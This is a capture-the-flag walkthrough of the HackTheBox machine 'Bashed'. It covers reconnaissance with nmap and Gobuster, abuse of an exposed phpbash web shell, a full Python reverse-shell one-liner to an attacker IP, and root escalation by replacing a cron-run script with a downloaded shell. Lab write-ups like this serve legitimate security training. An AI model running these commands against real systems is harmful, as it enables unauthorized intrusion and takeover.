HackTheBox: Bashed Walkthrough

Hello!!! This is the first machine that I have solved recently on HackTheBox. It is a simple box. Let’s start with recon.

Reconnaissance

Starting with a Nmap scan. The command Iused is: sudo nmap -sSV -sC -Pn MACHINE_IP

Following screenshot shows the results. Port 80 is open

Lets go to our browser and visit the web page. It is Arrexel’s Development Site. Notice the line written: ‘phpbash helps a lot with pentesting. I have tested it on multiple different servers and it was very useful. I actually developed it on this exact server!’.

After clicking on arrow we found some github link and an image of phpbash. It means that php is used by a developer to run bash commands on this website somewhere. This can be useful for us for exploitation.

So, now our task is to find that phpbash shell. Let’s perform directory search using the tool Gobuster. Following screenshot shows the result.

/dev, /php, /uploads can be useful for us.

Let’s start with http://MACHINE_IP/dev page. Yesss!!! We found something.

Going to ‘phpbash.php’ we found the phpbash shell. Try running some simple commands.

We found that we can communicate with the terminal.

Gaining Access

We can try gaining access by running reverse shell script. We can use the following python reverse shell script to gain access:

python -c ‘import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((“YOUR_IP”,1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([“/bin/sh”,”-i”]);’

As soon as we create a netcat listner using the command: ‘nc -lnvp 1234’ we will get a reverse shell.

Now we can take the User flag :-)

Privilege Escalation

Using sudo -l command we got to know that www-data user can run commands as ‘scriptmanager’.

Let’s use command: sudo -u scriptmanager /bin/bash to access scriptmanager account shell from www-data.

We have a folder named ‘scripts’ which is owned by user scriptmanager. Lets enter into this folder. Listing the content of this folder using the command ‘ls -al’. There are two files test.py and test.txt.

test.py is a python file with opens test.txt file and writes some string into it. One thing I noticed is the ‘time when the file was last accessed’. It changes after every minute for file test.txt.

And test.txt is opened by test.py. It means that test.py is running automatically may be a cronjob.

Let’s upload python reverse shell script on the machine.

Terminal 2: I created a HTTP Server using python from the directory where we have saved our reverse shell code. Using the command: python -m SimpleHTTPServer 8000

Coming back to the initial terminal using the command: ‘wget http://IP:8000/shell.py’ we can get shell script on the machine. Let’s remove older test.py (rm test.py).

And rename shell.py as test.py (mv shell.py test.py).

Open a netcat listener in terminal 3 and wait for the shell script to execute and get the reverse shell.

After some time we will get the reverse shell as root privileges.

It’s time to get Root flag. :-)

Congratulations!!! for successfully completing the challenge. Go ahead and solve more challenges.

Thank you!!!